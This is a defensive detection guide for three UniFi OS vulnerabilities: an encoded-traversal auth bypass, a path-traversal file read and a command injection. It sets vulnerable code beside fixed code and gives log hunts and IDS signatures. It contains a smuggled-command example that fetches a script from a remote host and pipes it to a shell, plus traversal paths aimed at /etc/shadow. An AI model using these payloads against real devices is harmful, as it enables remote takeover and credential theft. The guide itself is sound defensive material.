UniFi OS — SAB-064 Detection Walkthrough

Overview — three distinct doors, one appliance

These were publicly chained to unauthenticated root, but they are three separate weaknesses in three different sinks. 34908 and 34909 share one root cause (raw-vs-normalized URI handling) on two different routes; 34910 is independent.

From zero access to full control

The hard idea to teach: an attacker reaches full control without ever owning a valid account. Two of these bugs abuse a path traversal — a key that makes one door look like another — and the third injects a command. The part people miss: each bug, on its own, is enough to fully compromise the device — which is exactly why the vendor scored all three a maximum 10.0. Below: first the traversal mechanism, then the three independent routes to total control.

The mechanism — one URL, two interpretations

A traversal works because two pieces of code read the same request differently. The guard at the door reads the raw, encoded text; the worker inside reads the decoded path. Encode a ../ as ..%2f and you can show the guard a friendly path while the worker sees a forbidden one.

Three independent routes — each one alone is a 10.0

Detection theory — why these are visible in HTTP

CVE-2026-34908 — Access-control bypass (/proxy/)

Baseline traffic

Authenticated admin = 200. A direct, unauthenticated hit on the protected endpoint is correctly rejected 401.

The attack

Root cause — the code mistake

# Service identity for the access/exemption check is taken from the RAW URI ONLY.
map $request_uri $target_runnable {           # $request_uri = verbatim, still %-encoded
    default                       '';
    ~^/proxy/([a-z]+)/(.*)$        $1;      # $1 captured from the RAW string
    ~^/app-assets/([a-z]+)/(.*)$   $1;
}
# auth layer trusts $target_runnable (raw); routing uses the NORMALIZED $uri -> they diverge

# ALSO derive the service from the NORMALIZED URI, then reject any divergence.
map $uri $target_runnable_normalized {        # $uri = %-decoded + ../ resolved
    default                          '';
    ~^/proxy/([a-z][-a-z]*)/(.*)$       $1;   # also: hyphen fix for uid-agent, talk-relay
    ~^/app-assets/([a-z][-a-z]*)/(.*)$  $1;
}
server {
    if ($target_runnable != $target_runnable_normalized) { return 400; }  # raw != normalized = traversal
}

CVE-2026-34909 — Path traversal / file read (/app-assets/)

Baseline traffic

Normal asset: a real file path, large body (~278 KB), JS content-type, browser Referer.

The attack

Root cause — the code mistake

// serve /app-assets/<svc>/<path> from disk
svc, rel := parseAppAssets(r.URL.Path)              // rel = "../../../../etc/shadow"
full := filepath.Join(assetRoot, svc, rel)        // Join cleans ".." -> escapes assetRoot
data, _ := os.ReadFile(full)                       // reads /etc/shadow
w.Write(data)                                       // no containment check at all

# PRIMARY FIX (shipped): the same raw-vs-normalized nginx map as 34908 blocks the
# encoded traversal before it reaches the /app-assets handler (return 400).

// DEFENSE-IN-DEPTH the sink itself should also enforce containment:
full := filepath.Join(assetRoot, svc, rel)
if !strings.HasPrefix(filepath.Clean(full), assetRoot+"/") { http.Error(w, "forbidden", 403); return }
// or, Go 1.20+:  if !filepath.IsLocal(rel) { reject }
data, _ := os.ReadFile(full)

CVE-2026-34910 — Command injection (ucs update package name)

Root cause — the code mistake

// internal/pkg/utils.GetPackageVersion
f = "sudo dpkg -s %v 2>/dev/null | grep ^Version | awk '{print $2}'"
cmd = fmt.Sprintf(f, name)        // user-controlled
exec.Command("/bin/sh", "-c", cmd)   // shell!
       .CombinedOutput()

// internal/pkg/utils.GetPackageVersion
if assertValidName() != ok { return err }  // validate
exec.Command("dpkg-query",            // no shell
   "-W","-f","${Version}", name)            // arg vector
       .CombinedOutput()

The attack — name in URI/query (decoded: package=foo;curl http://203.0.113.66/x|sh)

The attack — name in POST body (payload NOT in default access logs)

When the package name rides in the body, the access log shows only the endpoint. Confirm on the host:

type=EXECVE ... argv[0]="/bin/sh" argv[1]="-c" argv[2]="dpkg -s foo;curl http://203.0.113.66/x|sh"  uid=ucs-update
Jun 09 14:31:45 udm sudo[20413]: ucs-update : USER=root ; COMMAND=/usr/bin/dpkg -i /tmp/x.deb

One demonstrated path (the public PoC chain) in logs

Note — this is only one of several possible routes. The PoC stitched all three together, but 34909 alone could instead end at a normal /api/login using a stolen credential, and 34908 or 34910 alone is sufficient too. Correlation rule for the SOC: same src_ip producing a 401→200 transition on a /proxy/ resource and/or any ..%2f on /app-assets/ and/or shell metacharacters on /ucs/update — any one is alarm-worthy; together = active exploitation.

Retro-hunt queries

ripgrep / grep over raw access logs

# Encoded traversal on the two vulnerable route families (34908 + 34909)
rg -iN '/(proxy|app-assets)/[^ ]*((\.\.|%2e%2e|\.%2e|%2e\.|%252e)(/|%2f|%5c|%252f))' access.log

# 34909 specifically reaching sensitive files
rg -iN '/app-assets/.*(%2e%2e|\.\.).*(etc%2f|%2fshadow|%2fpasswd|id_rsa|\.key)' access.log

# 34910 - shell metacharacters on the ucs update endpoint
rg -iN '/ucs/update[^ ]*(%3b|%7c|%60|%24%28|%0a|;|\||`|\$\()' access.log

# The bypass fingerprint: auth-exempt prefix followed by encoded dot-dot into /proxy
rg -iN '/api/auth/[^ ]*(\.\.|%2e%2e)(/|%2f).*proxy/' access.log

Splunk

index=unifi sourcetype=nginx:access
| rex field=_raw "\"(?<method>\S+)\s+(?<uri>\S+)\s+HTTP"
| where match(uri,"(?i)/(proxy|app-assets)/")
    AND match(uri,"(?i)(\.\.|%2e%2e|\.%2e|%2e\.|%252e)(/|%2f|%5c|%252f)")
| stats count min(_time) as first max(_time) as last values(status) as statuses by src_ip, uri

The “divergence” detection (most robust — mirrors the patch)

# Log BOTH raw and normalized, then alert when the captured service differs:
# nginx:  log_format hunt '$remote_addr "$request" raw=$request_uri norm=$uri $status';
# rule:   svc_raw  = capture( $request_uri , ^/(proxy|app-assets)/([a-z-]+)/ )
#         svc_norm = capture( $uri         , ^/(proxy|app-assets)/([a-z-]+)/ )
#         ALERT if svc_raw != svc_norm        # encoding-agnostic, ~0 FP

IDS signatures (Suricata 6/7)

alert http any any -> $HOME_NET any (
  msg:"CVE-2026-34908 UniFi OS auth bypass - encoded traversal into /proxy";
  flow:established,to_server; http.request_line;
  content:"/proxy/"; nocase;
  pcre:"/(?:\.\.|%2e%2e|\.%2e|%2e\.|%252e)(?:\/|%2f|%5c|%252f)/i";
  classtype:web-application-attack; reference:cve,2026-34908; sid:9000801; rev:1;)

alert http any any -> $HOME_NET any (
  msg:"CVE-2026-34909 UniFi OS path traversal - encoded traversal into /app-assets (file read)";
  flow:established,to_server; http.request_line;
  content:"/app-assets/"; nocase;
  pcre:"/(?:\.\.|%2e%2e|\.%2e|%2e\.|%252e)(?:\/|%2f|%5c|%252f)/i";
  classtype:web-application-attack; reference:cve,2026-34909; sid:9000901; rev:1;)

alert http any any -> $HOME_NET any (
  msg:"CVE-2026-34910 UniFi OS command injection - shell metachars in ucs update name";
  flow:established,to_server; http.uri; content:"/ucs/update"; nocase;
  pcre:"/(?:[;|&`]|\$\(|\$\{|\|\||&&|%3b|%7c|%26|%60|%24%28|%0a|\bdpkg\b|\bsystemctl\b|\$\(IFS)/iU";
  classtype:web-application-attack; reference:cve,2026-34910; sid:9001001; rev:1;)